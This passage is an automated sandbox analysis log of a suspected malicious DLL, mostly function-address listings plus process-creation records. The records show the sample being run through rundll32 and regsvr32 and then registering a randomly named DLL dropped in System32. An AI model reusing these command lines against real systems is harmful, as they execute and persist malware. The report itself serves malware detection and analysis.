                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800107583_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001435C3_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180009F5C3_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800293683_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800207683_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800173783_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800137803_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800153883_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000338C3_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000738C3_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800027903_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180027F9C3_2_0000000180027F9C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800197A03_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C7B43_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DFB43_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F7C03_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800097C03_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800157D83_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019FDC3_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017BDC3_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F7E03_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001FE03_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000002687B6C00003_2_000002687B6C0000
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180010FF44_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C0584_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800091004_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C6084_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800216184_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E3AC4_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DBE84_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FC0C4_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000580C4_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800220104_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001481C4_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A42C4_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800118344_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021C3C4_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000703C4_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000AC484_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000FC484_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800064584_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C05C4_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001A4604_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800298884_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D49C4_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008CA04_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800248A84_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015CB04_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800124B44_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C4B44_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800288B84_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800024B84_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000D8C44_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800250CC4_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800190D44_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017CE44_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800264F04_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800014F84_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020CFC4_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C9044_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800179084_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800215104_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9174_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000551C4_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F1284_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001CD384_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180016D3C4_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F9444_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800181484_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001ED504_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800131504_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D9504_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E9604_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019D604_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C9644_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001D684_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001496C4_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002D704_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800021784_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180024D804_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800185984_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800035984_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A9A84_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800119A84_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180025DAC4_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018DAC4_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800269B04_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800059B84_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800029BC4_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800141C04_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800125C44_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800121CC4_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800075D44_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800095DC4_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9E84_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800026104_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800196184_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013E284_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FA384_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A2704_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019E784_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DA804_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800246984_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000EE984_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800176B84_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AAB84_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180011AD04_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008AD84_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800296EC4_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A6EC4_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800132F04_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800193004_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BB044_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002870C4_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180026B104_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000131C4_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000671C4_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029B284_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180012F284_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000BB284_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001EB304_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800203344_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800107584_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001435C4_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009F5C4_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800293684_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800207684_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800173784_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800137804_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800153884_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000338C4_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000738C4_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800027904_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197A04_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C7B44_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DFB44_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F7C04_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800097C04_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800157D84_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019FDC4_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017BDC4_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F7E04_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001FE04_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000198952900004_2_0000019895290000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00FF00006_2_00FF0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180010FF46_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028C206_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C0586_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ACA46_2_000000018001ACA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000551C6_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800181486_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001496C6_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E1E06_2_000000018000E1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C6086_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800216186_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013E286_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002AE446_2_000000018002AE44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800252786_2_0000000180025278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000EE986_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A86_2_00000001800046A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004ACA6_2_0000000180004ACA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F06_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026B106_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DBE86_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FC0C6_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000580C6_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800220106_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001481C6_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A42C6_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800118346_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021C3C6_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000703C6_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000AC486_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000FC486_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800244586_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800064586_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C05C6_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A4606_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800298886_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D49C6_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008CA06_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800248A86_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015CB06_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800124B46_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C4B46_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800288B86_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800024B86_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D8C46_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800250CC6_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800190D46_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017CE46_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800264F06_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800014F86_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020CFC6_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800091006_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C9046_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800179086_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800215106_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9176_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F1286_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001CD386_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016D3C6_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F9446_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D9506_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800131506_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ED506_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E9606_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019D606_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C9646_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C5686_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001D686_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002D706_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800245746_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800021786_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024D806_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800185986_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800035986_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F1A46_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A9A86_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800119A86_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025DAC6_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018DAC6_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800269B06_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800059B86_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800029BC6_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800141C06_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800125C46_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800121CC6_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BDD06_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800075D46_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800095DC6_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9E86_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800026106_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800196186_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FA386_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A2706_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019E786_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DA806_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800246986_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800176B86_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AAB86_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002CAD06_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011AD06_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008AD86_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800296EC6_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A6EC6_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800193006_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001BB046_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002870C6_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000131C6_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000671C6_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029B286_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012F286_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BB286_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EB306_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800203346_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800107586_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001435C6_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009F5C6_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800293686_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800207686_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800173786_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800137806_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800153886_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000338C6_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000738C6_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800027906_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180027F9C6_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800197A06_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E3AC6_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: yj81rxDZIp.dllVirustotal: Detection: 35%
                      Source: yj81rxDZIp.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\yj81rxDZIp.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\yj81rxDZIp.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\yj81rxDZIp.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\yj81rxDZIp.dll,DllUnregisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NaMuLvbxXsNvT\LkWax.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
